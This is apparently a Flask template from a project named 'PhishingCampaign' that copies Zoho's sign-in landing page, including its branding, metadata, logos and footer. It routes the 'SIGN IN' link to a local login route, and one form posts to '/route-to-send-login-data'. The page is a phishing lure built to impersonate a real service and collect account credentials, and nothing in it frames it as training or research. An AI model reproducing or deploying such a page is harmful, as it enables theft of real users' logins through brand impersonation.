<!DOCTYPE html>
<!-- saved from url=(0031)https://www.zoho.com/login.html -->
<html lang="en">

<head>
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link rel="preconnect" href="https://www.zohowebstatic.com/">
    <link rel="dns-prefetch" href="https://www.zohowebstatic.com/">
    <link rel="preconnect" href="https://static.zohocdn.com/">
    <link rel="dns-prefetch" href="https://static.zohocdn.com/">
    <link rel="preload" href="https://static.zohocdn.com/zohofonts/zohopuvi/4.0/Zoho_Puvi_Regular.woff2" as="font" type="font/woff2" crossorigin="">
    <link rel="preload" href="https://static.zohocdn.com/zohofonts/zohopuvi/4.0/Zoho_Puvi_Bold.woff2" as="font" type="font/woff2" crossorigin="">
    <link rel="preload" href="https://static.zohocdn.com/zohofonts/zohopuvi/4.0/Zoho_Puvi_Semibold.woff2" as="font" type="font/woff2" crossorigin="">
    <script src="{{ url_for('static', filename='./sign-in_files/var_init.js') }}"></script>
    <script src="{{ url_for('static', filename='./sign-in_files/zoho.js') }}"></script>

    <!-- <script type="text/javascript" async="" src="/home/shibushivansh/PhishingCampaign/templates/sign-in_files/9e14ca550fb345518206a5a65a40a7a9.js"></script>
    <script src="/home/shibushivansh/PhishingCampaign/templates/sign-in_files/var_init.js"></script><script src="/home/shibushivansh/PhishingCampaign/templates/sign-in_files/zoho.js"></script> -->
    <title>Sign in to your Zoho Account</title>
    <meta name="description" content="Run your entire business with Zoho&#39;s suite of online productivity tools and SaaS applications. Over 75 million users trust us worldwide.Try our Forever Free Plan!">
    <link rel="icon" href="https://www.zohowebstatic.com/sites/zweb/images/favicon.ico" type="image/vnd.microsoft.icon">
    <link rel="canonical" href="https://www.zoho.com/login.html">
    <meta property="og:title" content="Sign in to your Zoho Account">
    <meta property="og:description" content="Run your entire business with Zoho&#39;s suite of online productivity tools and SaaS applications. Over 75 million users trust us worldwide.Try our Forever Free Plan!">
    <meta property="og:image" content="https://www.zohowebstatic.com/sites/zweb/images/ogimage/zoho-logo.png">
    <meta property="og:url" content="https://www.zoho.com/login.html">
    <meta property="og:site_name" content="Zoho">
    <meta property="og:type" content="website">
    <meta name="twitter:title" content="Sign in to your Zoho Account">
    <meta name="twitter:description" content="Run your entire business with Zoho&#39;s suite of online productivity tools and SaaS applications. Over 75 million users trust us worldwide.Try our Forever Free Plan!">
    <meta name="twitter:image" content="https://www.zohowebstatic.com/sites/zweb/images/ogimage/zoho-logo.png">
    <meta name="twitter:card" content="summary">
    <meta name="twitter:site" content="@zoho">
    <!-- <link rel="stylesheet" href="/home/shibushivansh/PhishingCampaign/templates/sign-in_files/zohocustom.css">
    <link rel="stylesheet" href="/home/shibushivansh/PhishingCampaign/templates/sign-in_files/zp_login_pages.css">
    <link rel="stylesheet" href="/home/shibushivansh/PhishingCampaign/templates/sign-in_files/zoho_general_pages.css">
    <link rel="stylesheet" href="/home/shibushivansh/PhishingCampaign/templates/sign-in_files/7504-en.css">
    <script src="/home/shibushivansh/PhishingCampaign/templates/sign-in_files/zc-headerfooter-v2.js"></script>
    <script class="infoload" src="/home/shibushivansh/PhishingCampaign/templates/sign-in_files/info"></script>
    <script class="infoload" src="/home/shibushivansh/PhishingCampaign/templates/sign-in_files/info(1)"></script>
    <script class="infoload" src="/home/shibushivansh/PhishingCampaign/templates/sign-in_files/info(2)"></script>
    <script class="infoload" src="/home/shibushivansh/PhishingCampaign/templates/sign-in_files/info(3)"></script>
    <script class="infoload" src="/home/shibushivansh/PhishingCampaign/templates/sign-in_files/info(4)"></script>
    <script class="infoload" src="/home/shibushivansh/PhishingCampaign/templates/sign-in_files/info(5)"></script>
    <script class="infoload" src="/home/shibushivansh/PhishingCampaign/templates/sign-in_files/info(6)"></script> -->
    <link rel="stylesheet" href="{{ url_for('static', filename='./sign-in_files/zohocustom.css') }}">
    <link rel="stylesheet" href="{{ url_for('static', filename='./sign-in_files/zp_login_pages.css') }}">
    <link rel="stylesheet" href="{{ url_for('static', filename='./sign-in_files/zoho_general_pages.css') }}">
    <link rel="stylesheet" href="{{ url_for('static', filename='./sign-in_files/7504-en.css') }}">
    <script src="{{ url_for('static', filename='./sign-in_files/info') }}"></script>
    <script src="{{ url_for('static', filename='./sign-in_files/info(1)') }}"></script>
    <script src="{{ url_for('static', filename='./sign-in_files/info(2)') }}"></script>
    <script src="{{ url_for('static', filename='./sign-in_files/info(3)') }}"></script>
    <script src="{{ url_for('static', filename='./sign-in_files/info(4)') }}"></script>
    <script src="{{ url_for('static', filename='./sign-in_files/info(5)') }}"></script>
    <script src="{{ url_for('static', filename='./sign-in_files/info(6)') }}"></script>
</head>

<body class="zw-page-7504 zw-product-73 zw-product-zoho_general_pages zw-template-zp_login_pages i18n-en r-g-f rmv-prd-menu ccode-in lang-en zos-linux zb-chrome zbv-chrome-139 ccode-apaccountries domain-com zph-sticky zph-sticky-home non-umain" data-prdname="zoho_general_pages" data-prdname-display="Zoho General Pages">
    <header>
        <div class="zw-promo-top">
            <div class="ztopstrip-container">
            </div>
        </div>
        <div class="zw-product-header">
            <div class="content-wrap">
                <div class="product-title">
                    <a href="https://www.zoho.com/">
                        <!-- <img src="{{ url_for('static', filename='./sign-in_files/zoho-logo-web.svg') }}"> -->
                        <img src="{{ url_for('static', filename='images/zoho-logo.svg') }}" alt="Zoho">
                        <!-- <img class="product-icon pi-zohologo" alt="Zoho" src="/home/shibushivansh/PhishingCampaign/templates/sign-in_files/zoho-logo-web.svg" width="88" height="39"></a> -->
                </div>
                <div class="zgh-accounts">
                    <a href="https://www.zoho.com/signup.html" class="zgh-signup" style="display: inline-block;">Get Started</a>
                </div>
            </div>
        </div>
    </header>
    <main>
        <div class="zw-template-inner" id="zw-template-inner">
            <div class="z-signup-page-wrap z-non-testimonial" style="height: 970px;">
                <div class="header-part">
                    <a class="logo" href="https://www.zoho.com/" style="opacity: 1;">ZOHO </a>
                    <span class="login-text">
                        <span>Have a Zoho Account?</span>
                        <a class="login zgh-login">SIGN IN</a>
                    </span>
                </div>

                <div class="signup-form-outer">
                    <div class="signup-form" style="display: block;">
                        <div class="z-product">
                            <a href="https://www.zoho.com/">
                                <!-- <img src="/static/images/zoho-logo-web.svg"> -->
                                <img src="{{ url_for('static', filename='images/zoho-logo.svg') }}" alt="Zoho">

                                <!-- <img typeof="foaf:Image" class="img-responsive" src="/home/shibushivansh/PhishingCampaign/templates/sign-in_files/zoho-logo.svg" width="48" height="48" style="opacity: 1;"> -->
                                <span></span>
                            </a>
                        </div>
                        <div class="loggedin-userinfo" style="display: none;">
                            <p class="zoho-logo-container">
                                <a href="https://www.zoho.com/">
                                    <!-- <img src="/static/images/zoho-logo-web.svg"> -->
                                    <img src="{{ url_for('static', filename='images/zoho-logo.svg') }}" alt="Zoho">

                                    <img class="zoho-logo-zh" width="" height="" src="/static/images/zoho-logo-web.svg">
                                </a>
                            </p>
                        </div>
                        <h3></h3>
                        <div class="region-wrap">
                            <div class="za-region-container">

                            </div>
                        </div>
                        <div class="zwelcome-info">
                            <p class="zoho-logo-container">
                                <a href="https://www.zoho.com/">
                                    <img src="/static/images/zoho-logo-web.svg">

                                    <h2>Log in to access Zoho.</h2>
                                    <a class="zlogin-apps" href="{{ url_for('login_page') }}">SIGN IN</a>

                                    <p class="zlogin-signup">Don't have a Zoho account?
                                        <a href="https://www.zoho.com/signup.html">Sign Up Now</a>
                                    </p>
                        </div>
                    </div>
                </div>
            </div>
        </div>

    </main>
    <footer class="zwf-new-footer zwf-general-footer">
        <div class="zw-only-copyright zwf-only-copyright">
            <p>© 2025, Zoho Corporation Pvt. Ltd. All Rights Reserved.</p>
        </div>
        <div class="zw-promo-bottom"></div>

    </footer>
    <aside>
        <div class="zw-other-info"></div>
        <div class="z-mobile-menu-v2">
            <div class="z-bottom-cta-menu ">
                <span class="mobile-menu-icon1">
                    <span class="zhamburger">
                        <span>&nbsp;</span>
                        <span>&nbsp;</span>
                        <span>&nbsp;</span>
                        <span>&nbsp;</span>
                        <span>&nbsp;</span>
                        <span>&nbsp;</span>
                    </span>
                </span>
                <a class="loggedout" href="https://www.zoho.com/signup.html">
                    <span>Sign Up for Free</span>
                </a>

                <a class="loggedin" href="same_this_file">
                    <span>Access Zoho home</span>
                </a>
            </div>

            <div class="zmobile-menu-new">
                <div class="zmobile-menu-new-inner">
                    <div class="zmobile-menu-search">
                        <div class="zmobile-menu-searchbox">
                            <form action="/route-to-send-login-data" id="zmobile-menu-searchaction">
                                <input type="text" class="zmobile-menu-searchinput" aria-label="Search zoho.com" placeholder="Search zoho.com">
                                <button class="zmobile-menu-searchbtn" type="submit" value="Submit">
                                    <span>search</span>
                                </button>
                            </form>
                        </div>
                    </div>
                    <div class="zmobile-menu-link">
                        <div class="zmobile-menu-new-content">
                            <div class="zmobile-menu-prdlogo">
                                <!-- <span><a class="prd_link" href="/">home</a></span> -->
                            </div>
                            <ul class="ulempty"></ul>
                            <div class="zcommon-link-container">
                                <span class="zlogin-menu" style="">
                                    <!-- <a href="login-page.html">Sign In</a> -->
                                    <a class="zlogin-apps" href="{{ url_for('login_page') }}">SIGN IN</a>

                                </span>
                                <span class="zallprd-menu">
                                    <a href="https://www.zoho.com/all-products.html">All Zoho Products</a>
                                </span>
                            </div>
                        </div>
                    </div>
                </div>
            </div>
        </div>
    </aside>
    <!-- <script src="/home/shibushivansh/PhishingCampaign/templates/sign-in_files/zcms.js"></script>
    <script src="/home/shibushivansh/PhishingCampaign/templates/sign-in_files/validation-plugin.js"></script>
    <script src="/home/shibushivansh/PhishingCampaign/templates/sign-in_files/zohocustom.js"></script>
    <script src="/home/shibushivansh/PhishingCampaign/templates/sign-in_files/zp_login_pages.js"></script>
    <script src="/home/shibushivansh/PhishingCampaign/templates/sign-in_files/zoho_general_pages.js"></script>
    <script src="/home/shibushivansh/PhishingCampaign/templates/sign-in_files/7504.js"></script></body> -->

</html>